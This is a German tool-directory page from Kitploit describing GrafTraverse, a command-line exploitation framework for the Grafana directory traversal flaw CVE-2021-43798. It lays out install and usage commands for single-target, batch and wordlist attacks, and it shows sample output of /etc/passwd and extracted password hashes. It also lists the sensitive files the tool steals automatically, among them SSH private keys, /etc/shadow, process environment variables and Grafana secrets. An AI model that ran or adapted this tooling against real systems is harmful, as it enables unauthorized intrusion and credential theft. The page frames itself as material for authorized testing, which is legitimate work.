Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
GrafTraverse-CVE-2021-43798 — CVE-2021-43798 MiNi Exploitation Framework | Kitploit
Tools/GitHubGitHub/asbawy/graftraverse-cve-2021-43798
Passwort-CrackingSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubasbawy/graftraverse-cve-2021-43798

GrafTraverse-CVE-2021-43798

CVE-2021-43798 MiNi Exploitation Framework

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

GrafTraverse - CVE-2021-43798 MiNi Exploitation Framework

Kommandozeilen-Automatisierungswerkzeug für autorisierte Sicherheitstests von Grafana Directory Traversal (CVE-2021-43798).


Übersicht

Banner

CVE-2021-43798 ist eine nicht authentifizierte Directory-Traversal-Sicherheitslücke in Grafana 8.x, die es Angreifern ermöglicht, beliebige Dateien im zugrunde liegenden Dateisystem über den /public/plugins/-Endpunkt zu lesen. Die Ursache ist eine unsachgemäße Pfadbereinigung bei Plugin-Asset-Anfragen, die es ../-Sequenzen ermöglicht, das vorgesehene Verzeichnis zu verlassen.

GrafTraverse ist eine vollständige Neufassung des ursprünglichen Proof-of-Concept. Es behebt kritische Fehler in der Anfrageverarbeitung, fügt mehrthreadiges Batch-Scannen, automatische Plugin-Erkennung, Extraktion von Anmeldeinformationen und strukturierte Berichterstellung hinzu – und macht es zu einem produktionsreifen Werkzeug für Red Teams und Penetrationstester.


Funktionen


Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse

# Sicherstellen, dass requests verfügbar ist (bei Kali vorinstalliert)
pip3 install requests

# Ausführbar machen
chmod +x GrafTraverse.py

Verwendung

GrafTraverse nutzt ein subcommand-basiertes CLI. Alle Befehle unterstützen --help.

1. Interaktives Einzelziel

Starte das interaktive Menü gegen einen Host:

root@kitploit:~
python3 GrafTraverse.py single -u http://IP:PORT
root@kitploit:~
============================================================
 INTERACTIVE MODE
============================================================
 1. /etc/passwd
 2. grafana.ini
 3. grafana.db
 4. Custom path
 5. Full automated loot
 6. Scan plugins
 7. Exit
============================================================

2. Plugin-Scan

Schnell identifizieren, welcher Plugin-Endpunkt angreifbar ist, ohne Exploitation:

root@kitploit:~
python3 GrafTraverse.py scan -u http://target:PORT

3. Batch-Scanning

Lade Ziele aus einer Datei und verarbeite sie gleichzeitig:

root@kitploit:~
python3 GrafTraverse.py batch -l targets.txt --workers 10 --csv results.csv

targets.txt-Format:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.target.com
# Zeilen, die mit # beginnen, werden ignoriert

4. Wortlisten-Enumeration

Übergebe eine benutzerdefinierte Dateiliste für tiefes Traversal:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --wordlist sensitive_files.txt   --output-dir ./loot   --json log.json

5. Proxy & Benutzerdefinierte Header

Route durch Burp Suite und füge benutzerdefinierte Header hinzu:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --proxy http://127.0.0.1:8080   -H "X-Forwarded-For: 127.0.0.1"   -H "Authorization: Bearer eyJ0..."

Befehlsreferenz

single

batch

FlagBeschreibung
-l, --listDatei mit Ziel-URLs (erforderlich)
--workersGleichzeitige Threads (Standard: 5)
(alle single-Flags werden unterstützt)

scan

FlagBeschreibung
-u, --urlZiel-URL (erforderlich)
(alle Netzwerk-Flags werden unterstützt)

Beispielausgabe

Erfolgreicher Dateiabruf

root@kitploit:~
[+] Output: 20260526_GrafTraverse
[*] Testing: /etc/passwd (via alertlist)
[+] SUCCESS: /etc/passwd (1874 bytes)

------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------

[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd

Extraktion von Grafana-DB-Hashes

root@kitploit:~
[*] Testing: /var/lib/grafana/grafana.db (via alertlist)
[+] SUCCESS: /var/lib/grafana/grafana.db (98304 bytes)
[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] Extracted 3 password hashes:
    admin:PBKDF2$sha256$10000$...base64...
    editor:PBKDF2$sha256$10000$...base64...
    viewer:PBKDF2$sha256$10000$...base64...

Zielfiles (Automatisierte Beute)

Die integrierte Beute-Sequenz versucht, die folgenden Dateien in dieser Reihenfolge abzurufen:


Betroffene Versionen

  • Grafana 8.0.0 bis 8.3.0
  • Behoben in 8.3.1 und 7.5.12
Tool herunterladen
FunktionBeschreibung
Multi-Plugin Brute-ForceTestet automatisch über 40 integrierte Plugins, um einen angreifbaren Pfad zu finden
Interaktiver ModusMenügesteuerte Einzelziel-Exploitation mit Live-Dateivorschau
Batch-ModusGleichzeitiges Scannen mehrerer Ziele mit konfigurierbaren Thread-Workern
Wortlisten-ModusTiefe Dateienumeration mit benutzerdefinierten Wortlisten
Automatische Hash-ExtraktionExtrahiert automatisch PBKDF2-Passwort-Hashes aus heruntergeladener grafana.db
Strukturiertes LoggingExportiert Ergebnisse nach JSON und CSV für nahtlose Berichterstellung
Proxy-UnterstützungLeitet Datenverkehr über Burp, ZAP oder einen beliebigen HTTP-Proxy (--proxy)
Benutzerdefinierte HeaderInjectiert beliebige Header für WAF-Umgehung oder Auth-Tokens (-H)
Traversal-AnpassungÜberschreibt die Standard-Traversal-Tiefe für nicht standardgemäße Umgebungen (--depth)
Intelligente FilterungEliminiert Fehlalarme durch Zurückweisung von Plugin-JS/CSS/HTML-Antworten
Null AbhängigkeitenErfordert nur requests (vorinstalliert auf Kali / Parrot)
FlagBeschreibung
-u, --urlZiel-URL (erforderlich)
--no-downloadNur-Lesen-Modus, keine Dateien speichern
-t, --timeoutAnfrage-Timeout in Sekunden (Standard: 10)
--proxyHTTP/HTTPS-Proxy-URL
-H, --headerBenutzerdefinierter Header (wiederholbar)
--depthTraversal-String (Standard: ../../../../../../../../)
--output-dirVerzeichnis zum Speichern abgerufener Dateien
--jsonErgebnisse an JSON-Logdatei anhängen
--csvErgebnisse an CSV-Logdatei anhängen
--wordlistDatei mit zu enumerierenden Pfaden
--pluginErzwinge einen bestimmten Plugin-Namen
DateiTypSensitivität
/etc/passwdTextBenutzerenumeration
/etc/shadowTextPasswort-Hashes (selten lesbar)
/etc/hostsTextNetzwerktopologie
/etc/hostnameTextHost-Identifikation
/etc/grafana/grafana.iniTextGrafana-Geheimnisse & DB-Anmeldedaten
/var/lib/grafana/grafana.dbBinärSQLite-DB mit Benutzer-Hashes & API-Schlüsseln
/var/log/grafana/grafana.logTextBetriebliche Informationen
/root/.ssh/id_rsaTextSSH-privater Schlüssel
/root/.ssh/authorized_keysTextSchlüsselbasierte Zugriffszuordnung
/proc/self/environTextProzessumgebungsvariablen
/proc/self/cmdlineTextProzessargumente
/proc/versionTextKernel-Version
/proc/mountsTextDateisystemlayout
/etc/os-releaseTextBetriebssystem-Identifikation
/etc/issueTextBetriebssystem-Identifikation
/etc/crontabTextGeplante Aufgaben
/etc/resolv.confTextDNS-Konfiguration